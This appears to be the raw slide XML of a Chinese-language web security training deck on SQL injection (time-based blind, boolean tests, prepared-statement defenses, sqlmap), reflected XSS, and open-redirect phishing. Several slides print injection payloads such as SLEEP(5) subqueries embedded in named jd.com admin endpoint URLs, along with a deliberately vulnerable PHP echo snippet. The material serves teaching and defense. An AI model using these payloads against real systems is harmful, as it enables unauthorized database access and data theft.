            </a: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AND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IF (substring(version(),1,1)=5,sleep(5),'t');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如果睡眠了5S，那么说明MySQL的版本为5，否则不是：</a:t>
            </a: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504190" y="541655"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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注入类型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2395" y="3348990"/>
            <a:ext cx="9568180" cy="10179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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="576461" y="1189293"/>
            <a:ext cx="6288405" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="5544427" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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000" dirty="0" err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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536829" y="3196863"/>
              <a:ext cx="4833948" cy="557719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lang="zh-CN" altLang="en-US" sz="14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Time-based blind SQL injection（基于时间延迟注入）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310640" y="1709420"/>
            <a:ext cx="8563610" cy="116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页面不返回错误信息，不输出UNION注入所查出来的泄露的信息。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类似搜索这类请求，布尔注入也无能为力，因为搜索返回空也属于正常的，这时就得采用基于时间的注入了，即判断请求响应的时间。</a:t>
            </a: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直接看执行时间判断是否存在注入，使用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and sleep(5)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504190" y="541655"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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注入类型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2395" y="2906395"/>
            <a:ext cx="5356860" cy="4203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2395" y="3438525"/>
            <a:ext cx="6095365" cy="26663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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="576461" y="1189293"/>
            <a:ext cx="6288405" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="5544427" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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000" dirty="0" err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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536829" y="3196863"/>
              <a:ext cx="4833948" cy="557719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lang="zh-CN" altLang="en-US" sz="14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Time-based blind SQL injection（基于时间延迟注入）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310640" y="1709420"/>
            <a:ext cx="9194165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页面不返回错误信息，不输出UNION注入所查出来的泄露的信息。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类似搜索这类请求，布尔注入也无能为力，因为搜索返回空也属于正常的，这时就得采用基于时间的注入了，即判断请求响应的时间。</a:t>
            </a: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实例：</a:t>
            </a:r>
          </a:p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购物圈后台管理系统多个接口存在SQL注入漏洞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http://wqadmin.jd.com/shopgroup/source/php/cgi/SaveActiveInfo.php?callback=saveActive&amp;s_active_rule={"i_rule_type":"1"}&amp;i_active_type=5&amp;s_active_name=你印象最深告白送的什么礼物？&amp;start_time=2018-11-16 09:59:00&amp;end_time=2018-11-16 10:00:00&amp;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i_business_id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=14220632985172864979 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AND (SELECT * FROM (SELECT(SLEEP(5)))AnqO)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&amp;s_prize_info=[{"from":1,"to":10,"prizeName":"脱单专属礼盒","prizeType":1},{"from":11,"to":20,"prizeName":"珠宝首饰盒","prizeType":1}]&amp;_=1542332814670</a:t>
            </a:r>
          </a:p>
          <a:p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拼购管理后台存在SQL注入漏洞： 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http://wq.jd.com/pingou_manage/pingou_pop_manage/source/php/cgi/stop_active.php?callback=stopActiveCbk&amp;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i_active_id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=15283392841025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AND (SELECT * FROM (SELECT(SLEEP(5)))inVN)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&amp;spuid=11556077953&amp;_=1528365460089</a:t>
            </a:r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504190" y="541655"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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注入类型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504190" y="503555"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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防御方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill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8015" y="1394460"/>
            <a:ext cx="6263640" cy="42875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绑定变量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一般来说，防御SQL注入的最佳方式，就是使用预编译语句，绑定变量。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="13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使用预编译的SQL语句，SQL语句的语义不会发生改变。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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Python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algn="l"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sql = "select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from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erp_table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where erpname =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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%s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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"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data = (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erpname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</a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"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cur.execute(sql,data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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Java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algn="l"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String sql = "select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from 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erp_table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where erpname =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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?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";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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使用预编译的SQL语句，攻击者无法改变SQL的结构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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="13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即使攻击者插入类似于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xiaoming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'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and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'1'='1的字符串，也只会将此字符串当做</a:t>
            </a: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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="13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erpname来查询。</a:t>
            </a:r>
            <a:endParaRPr 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965" y="4211955"/>
            <a:ext cx="2126615" cy="11188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11720" y="5387975"/>
            <a:ext cx="27432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反弹所有漏洞喷雾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C3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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09190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594360" y="1377315"/>
            <a:ext cx="3806825" cy="4253230"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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假设页面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把用户输入的参数直接输出到页面上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&lt;?php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$input = $_GET["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param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"];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echo "&lt;div&gt;".$input."&lt;/div&gt;";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?&gt;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48860" y="1257300"/>
            <a:ext cx="5753735" cy="127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）在正常情况下，用户向param提交的数据会展示到页面中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比如提交：http://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127.0.0.1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/test.php?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param=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test</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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会得到如下结果：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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190" y="2320290"/>
            <a:ext cx="5552440" cy="14382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190" y="4547870"/>
            <a:ext cx="5238115" cy="9906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848860" y="4248150"/>
            <a:ext cx="28651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）此时右键，查看网页源代码：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10" y="1689100"/>
            <a:ext cx="1826260" cy="12160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75790" y="1946275"/>
            <a:ext cx="19881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XSS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例子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2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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="576461" y="1198127"/>
            <a:ext cx="4406705" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="3885350" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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0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1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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6" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3196940"/>
              <a:ext cx="3175000" cy="557828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lang="en-US" altLang="zh-CN" sz="1600" kern="0" dirty="0" smtClean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portal</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" kern="0" dirty="0" smtClean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扫描</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" kern="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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="da-DK" altLang="zh-CN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3" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="576461" y="2265618"/>
            <a:ext cx="4406705" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="3885350" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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000" dirty="0" err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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3196940"/>
              <a:ext cx="3175000" cy="557828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lang="en-US" sz="1600" kern="0" dirty="0" smtClean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sqlmap</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" kern="0" dirty="0" smtClean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工具扫描</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="576461" y="3372943"/>
            <a:ext cx="4406705" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="3885350" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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000" dirty="0" err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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3196940"/>
              <a:ext cx="3175000" cy="557828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lang="zh-CN" altLang="en-US" sz="1600" kern="0" dirty="0" smtClean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手工测试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1296670" y="1585595"/>
            <a:ext cx="74580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portal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提交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CGI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扫描的时候默认使用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WVS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扫描，但是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WVS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对于post参数的检测效果较差</a:t>
            </a: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填写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post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参数，就会启动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sqlmap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进行扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310640" y="2785745"/>
            <a:ext cx="93014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专用于检测SQL注入的扫描工具，效果不错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渗透测试工具sqlmap基础教程：https://blog.csdn.net/zgyulongfei/article/details/41017493</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296670" y="3801745"/>
            <a:ext cx="8325485" cy="2368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AND 1=1 和 AND 1=2</a:t>
            </a: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' AND '1'='1 和 ' AND '1'='2</a:t>
            </a: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" AND "1"="1 和 " AND "1"="2</a:t>
            </a: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') AND ('1')=('1 和 ') AND ('1')=('2</a:t>
            </a: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") AND ("1")=("1 和 ") AND ("1")=("2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测试对象：json参数</a:t>
            </a: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http://wqadmin.jd.com/shopgroup/source/php/cgi/SaveActiveInfo.php?callback=saveActive&amp;s_active_rule={"i_rule_type":"1"}&amp;i_active_type=5&amp;s_active_name=你印象最深告白送的什么礼物？&amp;start_time=2018-11-16 09:59:00&amp;end_time=2018-11-16 10:00:00&amp;i_business_id=14220632985172864979 AND (SELECT * FROM (SELECT(SLEEP(5)))AnqO)&amp;s_prize_info=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="12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[{"from":1,"to":10,"prizeName":"脱单专属礼盒","prizeType":1},{"from":11,"to":20,"prizeName":"珠宝首饰盒","prizeType":1}]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&amp;_=1542332814670</a:t>
            </a:r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504190" y="541655"/>
            <a:ext cx="691007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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入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测试方法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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882" y="2367064"/>
            <a:ext cx="11520311" cy="1323036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX1" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX2" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY2" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX3" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY3" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX4" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX5" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX6" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY6" fmla="*/ 1076325 h 1076325"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY7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076325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7058024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1076325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1076325"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FA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025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882" y="2577070"/>
            <a:ext cx="8886240" cy="898525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53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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="453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跳转</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="453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8989125" y="2056556"/>
            <a:ext cx="1452039" cy="1419038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX1" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX2" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-2" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-3" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-5" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX3-7" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-10" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-12" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-13" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-15" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY2-16" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX3-17" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-18" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX4-19" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY4-20" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5-21" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5-22" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-23" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-24" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-25" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-26" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-27" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-28" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-29" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-30" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-31" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-32" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-33" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-34" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX6-35" fmla="*/ 917172 w 1152000"/>
              <a:gd name="connsiteY6-36" fmla="*/ 91441 h 1154343"/>
              <a:gd name="connsiteX0-37" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-38" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-39" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-40" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-41" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-42" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-43" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-44" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-45" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-46" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-47" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-48" fmla="*/ 0 h 1154343"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0-37" y="connsiteY0-38"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1-39" y="connsiteY1-40"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2-41" y="connsiteY2-42"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3-43" y="connsiteY3-44"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX4-45" y="connsiteY4-46"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX5-47" y="connsiteY5-48"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1152000" h="1154343">
                <a:moveTo>
                  <a:pt x="825732" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1152000" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152000" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323289" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050"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10250"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67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cs"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
          </a:p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53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cs"/>
              </a:rPr>
              <a:t>part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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跳转</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例子</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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09190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602615" y="1377315"/>
            <a:ext cx="9625330" cy="4253230"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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登陆成功后将跳转用户信息页：http://www.example.com/login.do?return_url=http://www.e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xa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mple.com/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userinfo.jsp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?u=1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恶意的攻击者若将URL修改为：http://www.example.com/login.do?return_url=http://www.e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ax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mple.com/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login.do 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在用户登录成功之后，仍显示一个登录的页面，只不过这次是另一个网站的登录页面，而且页面的整体风格都一样，并且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提示用户输入的用户名或者密码错误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用户会以为登录失败，就会再输入一次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，这次用户名和密码就会被提交到http://www.eaxmple.com/。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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99310" y="2113280"/>
            <a:ext cx="19881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rgbClr val="92410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以登录为例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1829435"/>
            <a:ext cx="803910" cy="874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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跳转</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简介</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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09190" y="1931035"/>
            <a:ext cx="680085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对角圆角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602615" y="1377315"/>
            <a:ext cx="9625330" cy="4253230"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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漏洞描述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服务端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未对传入的跳转url变量进行检查和控制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，可能导致可恶意构造任意一个恶意地址，诱导用户跳转到恶意网站。负责转向的程序没有验证合法性，直接根据传入的URL跳转 。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漏洞危害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1）跳转到站外</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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由于是从可信的站点跳转出去的，用户会比较信任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，所以跳转漏洞一般用于钓鱼攻击，通过转到恶意网站欺骗用户输入用户名和密码盗取用户信息，或欺骗用户进行金钱交易；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）跳转到站内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用户被指引到本网站内的一些管理员的管理界面，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如果访问控制没有做好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，可能导致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一般用户可以直接进入管理界面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40" y="1610995"/>
            <a:ext cx="1047750" cy="8064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64690" y="1860550"/>
            <a:ext cx="19881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漏洞简介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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="92592" y="942223"/>
            <a:ext cx="4813299" cy="847935"/>
            <a:chOff x="1016148" y="3007038"/>
            <a:chExt cx="4243840" cy="747730"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId18"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148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0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1</a:t>
              </a:r>
